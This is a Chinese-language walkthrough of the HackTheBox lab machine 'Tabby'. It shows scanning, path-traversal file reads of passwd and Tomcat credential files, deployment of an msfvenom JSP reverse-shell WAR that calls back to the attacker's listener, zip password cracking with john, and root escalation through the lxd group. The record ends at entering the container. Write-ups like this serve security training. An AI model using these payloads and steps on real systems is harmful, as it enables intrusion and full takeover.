Tabby-htb-writeup

0x00 靶场技能介绍

章节技能：本地文件包含、tomcat9用户配置文件查找、manager-script功能利用、zip2john 与 john 使用、lxd容器创建并将 Tabby 上的根文件系统挂载到容器中

参考链接：https://0xdf.gitlab.io/2020/11/07/htb-tabby.html

参考链接：https://www.hackingarticles.in/lxd-privilege-escalation/

参考链接：https://medium.com/@The_Hiker/hackthebox-tabby-walkthrough-thehiker-bec1f527ecb5

0x01 用户权限获取

1、获取下靶机IP地址：10.10.10.194

2、端口扫描下，获取下开放端口

┌──(kali㉿kali)-[~/桌面]
└─$ ports=$(nmap -p- --min-rate=1000 -T4 10.10.10.194 | grep ^[0-9] | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//)
                                                                                         
┌──(kali㉿kali)-[~/桌面]
└─$ nmap -sC -sV -p$ports 10.10.10.194
Starting Nmap 7.94SVN ( https://nmap.org ) at 2023-12-23 11:11 CST
Nmap scan report for 10.10.10.194
Host is up (0.29s latency).

PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.2p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 45:3c:34:14:35:56:23:95:d6:83:4e:26:de:c6:5b:d9 (RSA)
|   256 89:79:3a:9c:88:b0:5c:ce:4b:79:b1:02:23:4b:44:a6 (ECDSA)
|_  256 1e:e7:b9:55:dd:25:8f:72:56:e8:8e:65:d5:19:b0:8d (ED25519)
80/tcp   open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Mega Hosting
8080/tcp open  http    Apache Tomcat
|_http-open-proxy: Proxy might be redirecting requests
|_http-title: Apache Tomcat
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 17.70 seconds

3、使用nikto工具获取下一些目标网站的信息

┌──(kali㉿kali)-[~/桌面]
└─$ nikto -host http://10.10.10.194                   
- Nikto v2.5.0
---------------------------------------------------------------------------
+ Target IP:          10.10.10.194
+ Target Hostname:    10.10.10.194
+ Target Port:        80
+ Start Time:         2023-12-23 11:17:49 (GMT8)
---------------------------------------------------------------------------
+ Server: Apache/2.4.41 (Ubuntu)
+ /: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options
+ /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Apache/2.4.41 appears to be outdated (current is at least Apache/2.4.54). Apache 2.2.34 is the EOL for the 2.x branch.
+ /: Web Server returns a valid response with junk HTTP methods which may cause false positives.
+ 8052 requests: 1 error(s) and 4 item(s) reported on remote host
+ End Time:           2023-12-23 11:59:10 (GMT8) (2481 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

4、查看下两个端口网站的页面信息

http://10.10.10.194

http://10.10.10.194:8080

5、根据80端口页面源码信息，发现了一个特殊的URL访问地址

http://megahosting.htb/news.php?file=statement

6、本地先绑定下hosts信息

┌──(kali㉿kali)-[~/桌面]
└─$ echo "10.10.10.194 megahosting.htb" | sudo tee -a /etc/hosts
[sudo] kali 的密码：
10.10.10.194 megahosting.htb

7、通过研究这个URL地址，发现这个是一个涉及本地文件包含的漏洞地址，可以获取到靶机上的一些信息

http://megahosting.htb/news.php?file=../../../../../../../../etc/passwd

root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/usr/sbin/nologin man:x:6:12:man:/var/cache/man:/usr/sbin/nologin lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin mail:x:8:8:mail:/var/mail:/usr/sbin/nologin news:x:9:9:news:/var/spool/news:/usr/sbin/nologin uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin proxy:x:13:13:proxy:/bin:/usr/sbin/nologin www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin backup:x:34:34:backup:/var/backups:/usr/sbin/nologin list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin systemd-network:x:100:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin systemd-timesync:x:102:104:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin messagebus:x:103:106::/nonexistent:/usr/sbin/nologin syslog:x:104:110::/home/syslog:/usr/sbin/nologin _apt:x:105:65534::/nonexistent:/usr/sbin/nologin tss:x:106:111:TPM software stack,,,:/var/lib/tpm:/bin/false uuidd:x:107:112::/run/uuidd:/usr/sbin/nologin tcpdump:x:108:113::/nonexistent:/usr/sbin/nologin landscape:x:109:115::/var/lib/landscape:/usr/sbin/nologin pollinate:x:110:1::/var/cache/pollinate:/bin/false sshd:x:111:65534::/run/sshd:/usr/sbin/nologin systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin lxd:x:998:100::/var/snap/lxd/common/lxd:/bin/false tomcat:x:997:997::/opt/tomcat:/bin/false mysql:x:112:120:MySQL Server,,,:/nonexistent:/bin/false ash:x:1000:1000:clive:/home/ash:/bin/bas

8、但是由于权限的原因，获取的信息并不多，这里结合 8080 端口的绝对路径信息，我们可以尝试获取下一些tomcat 的配置信息

┌──(kali㉿kali)-[~/桌面]
└─$ curl http://megahosting.htb/news.php?file=../../../../../../../../etc/tomcat9/tomcat-users.xml 

9、但是按照两个端口网站结合的信息来说，应该是让通过本地文件包含来获取账号配置信息，并登录tomcat的管理界面的，这里通过谷歌搜索成功获取到另一个配置目录的绝对地址，并且可以获取到一些信息

┌──(kali㉿kali)-[~/桌面]
└─$ curl http://megahosting.htb/news.php?file=../../../../../../../../usr/share/tomcat9/etc/tomcat-users.xml
<?xml version="1.0" encoding="UTF-8"?>
<!--
  Licensed to the Apache Software Foundation (ASF) under one or more
  contributor license agreements.  See the NOTICE file distributed with
  this work for additional information regarding copyright ownership.
  The ASF licenses this file to You under the Apache License, Version 2.0
  (the "License"); you may not use this file except in compliance with
  the License.  You may obtain a copy of the License at

      http://www.apache.org/licenses/LICENSE-2.0

  Unless required by applicable law or agreed to in writing, software
  distributed under the License is distributed on an "AS IS" BASIS,
  WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
  See the License for the specific language governing permissions and
  limitations under the License.
-->
<tomcat-users xmlns="http://tomcat.apache.org/xml"
              xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
              xsi:schemaLocation="http://tomcat.apache.org/xml tomcat-users.xsd"
              version="1.0">
<!--
  NOTE:  By default, no user is included in the "manager-gui" role required
  to operate the "/manager/html" web application.  If you wish to use this app,
  you must define such a user - the username and password are arbitrary. It is
  strongly recommended that you do NOT use one of the users in the commented out
  section below since they are intended for use with the examples web
  application.
-->
<!--
  NOTE:  The sample user and role entries below are intended for use with the
  examples web application. They are wrapped in a comment and thus are ignored
  when reading this file. If you wish to configure these users for use with the
  examples web application, do not forget to remove the <!.. ..> that surrounds
  them. You will also need to set the passwords to something appropriate.
-->
<!--
  <role rolename="tomcat"/>
  <role rolename="role1"/>
  <user username="tomcat" password="<must-be-changed>" roles="tomcat"/>
  <user username="both" password="<must-be-changed>" roles="tomcat,role1"/>
  <user username="role1" password="<must-be-changed>" roles="role1"/>
-->
   <role rolename="admin-gui"/>
   <role rolename="manager-script"/>
   <user username="tomcat" password="$3cureP4s5w0rd123!" roles="admin-gui,manager-script"/>
</tomcat-users>

10、到这里，我们获取到了Tomcat的密码：$3cureP4s5w0rd123!

11、通过尝试，发现该密码可以登录到以下管理路径

http://10.10.10.194:8080/host-manager/html

12、到这里正常来说是通过这个页面进行提权的，但是各种搜集枚举，并没有发现什么提权方法，且各种目录扫描也没有发现任何有用信息，这个时候已经陷入到兔子洞的范畴了

13、通过查看演示文档，发现了别人通过目录枚举能获取到以下一个关键的功能目录地址

http://localhost:8080/manager/text/deploy?path=/foo

14、通过检索相关技术文档，发现这个是一个可以上传并部署war的一个接口功能

manager-script 权限是 Apache Tomcat 的 Manager App 的一个角色，允许用户通过 HTTP 协议使用命令行工具（如 curl 或 wget）或脚本（如 Ant 脚本）与 Tomcat 的管理接口进行交互。

Manager App 是一个 Web 应用程序，提供了对 Tomcat 运行时状态的访问和管理功能。manager-script 角色允许用户通过命令行方式执行以下操作：

部署和卸载 Web 应用程序（WAR 文件）： 用户可以使用 HTTP PUT 请求将 WAR 文件部署到 Tomcat，并使用 HTTP DELETE 请求卸载已部署的应用程序。

查看和操作部署的应用程序状态： 用户可以通过 HTTP 请求查看已部署应用程序的状态，如启动、停止或重新启动。

访问 Server Status 页面： 用户可以通过 HTTP 请求获取 Tomcat 服务器的当前状态信息。

这个权限对于通过自动化脚本或工具来管理和部署应用程序非常有用，因为它提供了一种程序化的方式来与 Tomcat 交互。然而，由于这个权限涉及对 Tomcat 管理接口的访问，因此在生产环境中应该小心配置，确保只有受信任的用户或系统能够访问这些功能。

15、通过这个信息，开始检索所有能利用的具体方法演示描述

https://tomcat.apache.org/tomcat-7.0-doc/manager-howto.html#Deploy_A_New_Application_Archive_(WAR)_Remotely

使用 curl 部署 WAR 文件到 Tomcat 的 Manager App 需要以下步骤：

准备 WAR 文件： 确保你有一个有效的 WAR 文件，这是你要部署的 Web 应用程序。

构造 curl 命令： 使用 curl 命令向 Tomcat 的 Manager App 发送 HTTP PUT 请求来部署 WAR 文件。以下是一个示例命令：

curl -v -u username:password -T path/to/your/app.war http://localhost:8080/manager/text/deploy?path=/contextPath

-v: 显示详细信息，包括 HTTP 请求和响应头。
-u username:password: 提供 Tomcat Manager 的用户名和密码。
-T path/to/your/app.war: 指定要上传的 WAR 文件的路径。
http://localhost:8080/manager/text/deploy?path=/contextPath: 指定 Manager App 的部署路径，其中 http://localhost:8080 是你的 Tomcat 地址，/manager/text/deploy 是 Manager App 的文本接口路径，/contextPath 是你要部署应用程序的上下文路径。
执行 curl 命令： 执行构造的 curl 命令，发送 PUT 请求并部署 WAR 文件。确保替换命令中的用户名、密码、WAR 文件路径和 Tomcat 地址等参数。

示例：

curl -v -u admin:admin -T path/to/your/app.war http://localhost:8080/manager/text/deploy?path=/yourapp

请注意，这是一个基本示例，实际情况可能需要根据你的 Tomcat 配置和安全性要求进行调整。确保你已经正确配置 Tomcat Manager 用户，并且只允许受信任的用户访问 Manager App。

16、接下来开始使用 msfvenom 生成一个反弹shell的 .war 包文件

┌──(kali㉿kali)-[~/桌面]
└─$ msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.2 LPORT=443 -f war -o shell.war 
Payload size: 1093 bytes
Final size of war file: 1093 bytes
Saved as: shell.war

17、使用curl工具进行上次我们的war包文件

┌──(kali㉿kali)-[~/桌面]
└─$ curl -v -u 'tomcat:$3cureP4s5w0rd123!' -T shell.war http://10.10.10.194:8080/manager/text/deploy?path=/shell
*   Trying 10.10.10.194:8080...
* Connected to 10.10.10.194 (10.10.10.194) port 8080
* Server auth using Basic with user 'tomcat'
> PUT /manager/text/deploy?path=/shell HTTP/1.1
> Host: 10.10.10.194:8080
> Authorization: Basic dG9tY2F0OiQzY3VyZVA0czV3MHJkMTIzIQ==
> User-Agent: curl/8.4.0
> Accept: */*
> Content-Length: 1093
> 
* We are completely uploaded and fine
< HTTP/1.1 200 
< Cache-Control: private
< Expires: Thu, 01 Jan 1970 00:00:00 GMT
< X-Content-Type-Options: nosniff
< Content-Type: text/plain;charset=utf-8
< Transfer-Encoding: chunked
< Date: Sat, 23 Dec 2023 04:44:04 GMT
< 
OK - Deployed application at context path [/shell]
* Connection #0 to host 10.10.10.194 left intact

18、开始本地监听，并使用浏览器访问目标war包地址，至此成功获取初始靶机权限

http://10.10.10.194:8080/shell

┌──(kali㉿kali)-[~/桌面]
└─$ nc -lvnp 443                      
listening on [any] 443 ...
connect to [10.10.14.2] from (UNKNOWN) [10.10.10.194] 52692
id
uid=997(tomcat) gid=997(tomcat) groups=997(tomcat)
python3 -c 'import pty;pty.spawn("/bin/bash")'
tomcat@tabby:/var/lib/tomcat9$ 

tomcat@tabby:/var/lib/tomcat9$ ls
ls
conf  lib  logs  policy  webapps  work

19、通过对当前网站源码下进行信息枚举，发现了一个压缩包文件

tomcat@tabby:/var/lib/tomcat9$ cd /var/www/html                                 
cd /var/www/html
tomcat@tabby:/var/www/html$ ls
ls
assets  favicon.ico  files  index.php  logo.png  news.php  Readme.txt
tomcat@tabby:/var/www/html$ cd files
cd files
tomcat@tabby:/var/www/html/files$ ls
ls
16162020_backup.zip  archive  revoked_certs  statement
tomcat@tabby:/var/www/html/files$ ls -la
ls -la
total 36
drwxr-xr-x 4 ash  ash  4096 Aug 19  2021 .
drwxr-xr-x 4 root root 4096 Aug 19  2021 ..
-rw-r--r-- 1 ash  ash  8716 Jun 16  2020 16162020_backup.zip                             
drwxr-xr-x 2 root root 4096 Aug 19  2021 archive                                         
drwxr-xr-x 2 root root 4096 Aug 19  2021 revoked_certs
-rw-r--r-- 1 root root 6507 Jun 16  2020 statement
tomcat@tabby:/var/www/html/files$

20、这里使用网站上的本地文件包含漏洞，成功下载到本地该压缩包文件

┌──(kali㉿kali)-[~/桌面]
└─$ wget http://megahosting.htb/news.php?file=../../../../../../../../var/www/html/files/16162020_backup.zip     
--2023-12-23 12:53:25--  http://megahosting.htb/news.php?file=../../../../../../../../var/www/html/files/16162020_backup.zip
正在解析主机 megahosting.htb (megahosting.htb)... 10.10.10.194
正在连接 megahosting.htb (megahosting.htb)|10.10.10.194|:80... 已连接。
已发出 HTTP 请求，正在等待回应... 200 OK
长度：未指定 [text/html]
正在保存至: “news.php?file=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fvar%2Fwww%2Fhtml%2Ffiles%2F16162020_backup.zip”

news.php?file=..%2F..%     [ <=>                      ]   8.51K  --.-KB/s  用时 0s      

2023-12-23 12:53:26 (301 MB/s) - “news.php?file=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fvar%2Fwww%2Fhtml%2Ffiles%2F16162020_backup.zip” 已保存 [8716]

21、通过解压该压缩包，发现需要输入密码

┌──(kali㉿kali)-[~/桌面]
└─$ unzip 16162020_backup.zip 
Archive:  16162020_backup.zip
   creating: var/www/html/assets/
[16162020_backup.zip] var/www/html/favicon.ico password: 
   skipping: var/www/html/favicon.ico  incorrect password
   creating: var/www/html/files/
   skipping: var/www/html/index.php  incorrect password
   skipping: var/www/html/logo.png   incorrect password
   skipping: var/www/html/news.php   incorrect password
   skipping: var/www/html/Readme.txt  incorrect password

22、使用 zip2john 和 John 进行破解该压缩包

┌──(kali㉿kali)-[~/桌面]
└─$ zip2john 16162020_backup.zip > hashzip 
ver 1.0 16162020_backup.zip/var/www/html/assets/ is not encrypted, or stored with non-handled compression type
ver 2.0 efh 5455 efh 7875 16162020_backup.zip/var/www/html/favicon.ico PKZIP Encr: TS_chk, cmplen=338, decmplen=766, crc=282B6DE2 ts=7DB5 cs=7db5 type=8
ver 1.0 16162020_backup.zip/var/www/html/files/ is not encrypted, or stored with non-handled compression type
ver 2.0 efh 5455 efh 7875 16162020_backup.zip/var/www/html/index.php PKZIP Encr: TS_chk, cmplen=3255, decmplen=14793, crc=285CC4D6 ts=5935 cs=5935 type=8
ver 1.0 efh 5455 efh 7875 ** 2b ** 16162020_backup.zip/var/www/html/logo.png PKZIP Encr: TS_chk, cmplen=2906, decmplen=2894, crc=02F9F45F ts=5D46 cs=5d46 type=0
ver 2.0 efh 5455 efh 7875 16162020_backup.zip/var/www/html/news.php PKZIP Encr: TS_chk, cmplen=114, decmplen=123, crc=5C67F19E ts=5A7A cs=5a7a type=8
ver 2.0 efh 5455 efh 7875 16162020_backup.zip/var/www/html/Readme.txt PKZIP Encr: TS_chk, cmplen=805, decmplen=1574, crc=32DB9CE3 ts=6A8B cs=6a8b type=8
NOTE: It is assumed that all files in each archive have the same password.
If that is not the case, the hash may be uncrackable. To avoid this, use
option -o to pick a file at a time.
                                                                                         
┌──(kali㉿kali)-[~/桌面]
└─$ sudo john ./hashzip --wordlist=/usr/share/wordlists/rockyou.txt 
[sudo] kali 的密码：
Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
Will run 3 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
admin@it         (16162020_backup.zip)     
1g 0:00:00:00 DONE (2023-12-23 12:56) 1.818g/s 18856Kp/s 18856Kc/s 18856KC/s adzlogan..adamsapple:)1
Use the "--show" option to display all of the cracked passwords reliably
Session completed. 

23、成功破解出密码，密码为： admin@it ，但是解压缩出压缩包，压缩包里并没有什么有用的信息

┌──(kali㉿kali)-[~/桌面]
└─$ unzip 16162020_backup.zip                                   
Archive:  16162020_backup.zip
[16162020_backup.zip] var/www/html/favicon.ico password: 
  inflating: var/www/html/favicon.ico  
  inflating: var/www/html/index.php  
 extracting: var/www/html/logo.png   
  inflating: var/www/html/news.php   
  inflating: var/www/html/Readme.txt  
     
┌──(kali㉿kali)-[~/桌面]
└─$ cd ./var 

┌──(kali㉿kali)-[~/桌面/var]
└─$ ls
www

┌──(kali㉿kali)-[~/桌面/var]
└─$ cd www  

┌──(kali㉿kali)-[~/桌面/var/www]
└─$ ls
html

┌──(kali㉿kali)-[~/桌面/var/www]
└─$ cd html 

┌──(kali㉿kali)-[~/桌面/var/www/html]
└─$ ls
assets  favicon.ico  files  index.php  logo.png  news.php  Readme.txt

24、根据以往判断，该压缩包密码应该就是前期查看的 etc/passwd 里 ash 用户的密码，逐进行ssh登录

┌──(kali㉿kali)-[~/桌面/var/www/html]
└─$ ssh ash@10.10.10.194                                           
The authenticity of host '10.10.10.194 (10.10.10.194)' can't be established.
ED25519 key fingerprint is SHA256:mUt3fTn2/uoySPc6XapKq69a2/3EPRdW0T79hZ2davk.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.10.194' (ED25519) to the list of known hosts.
ash@10.10.10.194: Permission denied (publickey).

25、发现无法通过ssh的形式登录，那就通过初始权限进行su 切换，至此获取到第一个flag信息

tomcat@tabby:/var/www/html/files$ su ash
su ash
Password: admin@it

ash@tabby:/var/www/html/files$ 

ash@tabby:/var/www/html/files$ cd /home/ash
cd /home/ash
ash@tabby:~$ ls
ls
user.txt
ash@tabby:~$ cat user.txt
cat user.txt
768309c7c35c34564705bf6bf54b8390
ash@tabby:~$ 

0x02 系统权限获取

26、通过查看自身账号用户组，发现我们拥有 lxd 组的权限，lxd组是一个虚拟容器的东西

ash@tabby:~$ id
id
uid=1000(ash) gid=1000(ash) groups=1000(ash),4(adm),24(cdrom),30(dip),46(plugdev),116(lxd)
ash@tabby:~$ sudo -l
sudo -l
sudo: unable to open /run/sudo/ts/ash: Read-only file system
[sudo] password for ash: admin@it

Sorry, user ash may not run sudo on tabby.
ash@tabby:~$ 

27、这里应该是让通过lxd容器镜像挂在的方式进行挂到到root目录下，并行读取相关信息和文件，由于我对这块的技能实在薄弱，故参考演示文档进行操作

在 LXD (Linux Containers Daemon) 中，你可以使用 lxc 命令来管理容器。要列出存在的容器（类似于 VM 映像），可以使用以下命令：

lxc list
这会列出当前系统中的所有容器，包括它们的名称、状态、IP 地址等信息。如果你只想列出运行中的容器，可以使用 -c 选项：

lxc list -c ns
请确保在运行这些命令时有足够的权限，通常需要使用 sudo 或者具有相应权限的用户。

本地“lxd”组的成员可以立即将权限升级为主机操作系统上的 root。这与该用户是否已被授予 sudo 权限无关，并且不需要他们输入密码。即使使用 LXD snap 包，该漏洞也存在。

LXD 是一个根进程，可为任何对 LXD UNIX 套接字具有写访问权限的人执行操作。它通常不会尝试匹配调用用户的权限。有多种方法可以利用这一点。

其中之一是使用 LXD API 将主机的根文件系统挂载到本文将使用的容器中。这为低权限用户提供了对主机文件系统的 root 访问权限。

28、查看下当前靶机的系统环境

ash@tabby:~$ uname -a
uname -a
Linux tabby 5.4.0-31-generic #35-Ubuntu SMP Thu May 7 20:20:34 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
ash@tabby:~$ 

29、下载漏洞利用制作等工具程序，并着手制作镜像

root@InfoSec:~# git clone  https://github.com/saghul/lxd-alpine-builder.git
Cloning into 'lxd-alpine-builder'...
remote: Enumerating objects: 50, done.
remote: Counting objects: 100% (8/8), done.
remote: Compressing objects: 100% (6/6), done.
remote: Total 50 (delta 2), reused 5 (delta 2), pack-reused 42
Receiving objects: 100% (50/50), 3.11 MiB | 1.43 MiB/s, done.
Resolving deltas: 100% (15/15), done.
root@InfoSec:~# cd lxd-alpine-builder
root@InfoSec:~/lxd-alpine-builder# ls
alpine-v3.13-x86_64-20210218_0139.tar.gz  build-alpine  LICENSE  README.md
root@InfoSec:~/lxd-alpine-builder# ./build-alpine
Determining the latest release... v3.19
Using static apk from http://dl-cdn.alpinelinux.org/alpine//v3.19/main/x86_64
Downloading alpine-keys-2.4-r1.apk
tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
Downloading apk-tools-static-2.14.0-r5.apk
tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
alpine-devel@lists.alpinelinux.org-6165ee59.rsa.pub: OK
Verified OK
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100  2724  100  2724    0     0    594      0  0:00:04  0:00:04 --:--:--   594
--2023-12-23 13:23:24--  http://alpine.mirror.wearetriple.com/MIRRORS.txt
Resolving alpine.mirror.wearetriple.com (alpine.mirror.wearetriple.com)... 93.187.10.106, 2a00:1f00:dc06:10::106
Connecting to alpine.mirror.wearetriple.com (alpine.mirror.wearetriple.com)|93.187.10.106|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 2724 (2.7K) [text/plain]
Saving to: ‘/root/lxd-alpine-builder/rootfs/usr/share/alpine-mirrors/MIRRORS.txt’

/root/lxd-alpine-builder/rootfs/usr/s 100%[=========================================================================>]   2.66K  --.-KB/s    in 0s      

2023-12-23 13:23:25 (394 MB/s) - ‘/root/lxd-alpine-builder/rootfs/usr/share/alpine-mirrors/MIRRORS.txt’ saved [2724/2724]

Selecting mirror http://repo.iut.ac.ir/repo/alpine/v3.19/main
fetch http://repo.iut.ac.ir/repo/alpine/v3.19/main/x86_64/APKINDEX.tar.gz
(1/25) Installing alpine-baselayout-data (3.4.3-r2)
(2/25) Installing musl (1.2.4_git20230717-r4)
(3/25) Installing busybox (1.36.1-r15)
Executing busybox-1.36.1-r15.post-install
(4/25) Installing busybox-binsh (1.36.1-r15)
(5/25) Installing alpine-baselayout (3.4.3-r2)
Executing alpine-baselayout-3.4.3-r2.pre-install
Executing alpine-baselayout-3.4.3-r2.post-install
(6/25) Installing ifupdown-ng (0.12.1-r4)
(7/25) Installing libcap2 (2.69-r1)
(8/25) Installing openrc (0.52.1-r1)
Executing openrc-0.52.1-r1.post-install
(9/25) Installing mdev-conf (4.6-r0)
(10/25) Installing busybox-mdev-openrc (1.36.1-r15)
(11/25) Installing alpine-conf (3.17.0-r0)
(12/25) Installing alpine-keys (2.4-r1)
(13/25) Installing alpine-release (3.19.0-r0)
(14/25) Installing ca-certificates-bundle (20230506-r0)
(15/25) Installing libcrypto3 (3.1.4-r2)
(16/25) Installing libssl3 (3.1.4-r2)
(17/25) Installing ssl_client (1.36.1-r15)
(18/25) Installing zlib (1.3-r2)
(19/25) Installing apk-tools (2.14.0-r5)
(20/25) Installing busybox-openrc (1.36.1-r15)
(21/25) Installing busybox-suid (1.36.1-r15)
(22/25) Installing scanelf (1.3.7-r2)
(23/25) Installing musl-utils (1.2.4_git20230717-r4)
(24/25) Installing libc-utils (0.7.2-r5)
(25/25) Installing alpine-base (3.19.0-r0)
Executing busybox-1.36.1-r15.trigger
OK: 10 MiB in 25 packages
root@InfoSec:~/lxd-alpine-builder# ls
alpine-v3.13-x86_64-20210218_0139.tar.gz  alpine-v3.19-x86_64-20231223_1324.tar.gz  build-alpine  LICENSE  README.md
root@InfoSec:~/lxd-alpine-builder# 

30、下载到目标靶机上面，并进行利用部署

wget http://10.10.14.2:8000/alpine-v3.19-x86_64-20231223_1324.tar.gz

ash@tabby:~$ cd ~
cd ~
ash@tabby:~$ ls
ls
alpine-v3.19-x86_64-20231223_1324.tar.gz  snap  user.txt
ash@tabby:~$ lxd init
lxd init
Would you like to use LXD clustering? (yes/no) [default=no]: 

Do you want to configure a new storage pool? (yes/no) [default=yes]: 

Name of the new storage pool [default=default]: 

Name of the storage backend to use (btrfs, dir, lvm, zfs, ceph) [default=zfs]: dir
dir
Would you like to connect to a MAAS server? (yes/no) [default=no]: 

Would you like to create a new local network bridge? (yes/no) [default=yes]: 

What should the new bridge be called? [default=lxdbr0]: 

What IPv4 address should be used? (CIDR subnet notation, “auto” or “none”) [default=auto]: 

What IPv6 address should be used? (CIDR subnet notation, “auto” or “none”) [default=auto]: 

Would you like the LXD server to be available over the network? (yes/no) [default=no]: 

Would you like stale cached images to be updated automatically? (yes/no) [default=yes] 

Would you like a YAML "lxd init" preseed to be printed? (yes/no) [default=no]: 

ash@tabby:~$ lxc image list
lxc image list
+---------+--------------+--------+-------------------------------+--------------+-----------+--------+------------------------------+
|  ALIAS  | FINGERPRINT  | PUBLIC |          DESCRIPTION          | ARCHITECTURE |   TYPE    |  SIZE  |         UPLOAD DATE          |
+---------+--------------+--------+-------------------------------+--------------+-----------+--------+------------------------------+
| myimage | 6874271ece3b | no     | alpine v3.19 (20231223_13:24) | x86_64       | CONTAINER | 3.48MB | Dec 23, 2023 at 6:03am (UTC) |
+---------+--------------+--------+-------------------------------+--------------+-----------+--------+------------------------------+
ash@tabby:~$ lxc init myimage ignite -c security.privileged=true
lxc init myimage ignite -c security.privileged=true
Creating ignite
ash@tabby:~$ lxc config device add ignite mydevice disk source=/ path=/mnt/root recursive=true
<ydevice disk source=/ path=/mnt/root recursive=true
Device mydevice added to ignite
ash@tabby:~$ lxc start ignite
lxc start ignite

31、至此，执行最后一步，获取到目标靶机下的root的flag信息

ash@tabby:~$ lxc exec ignite /bin/sh
lxc exec ignite /bin/sh
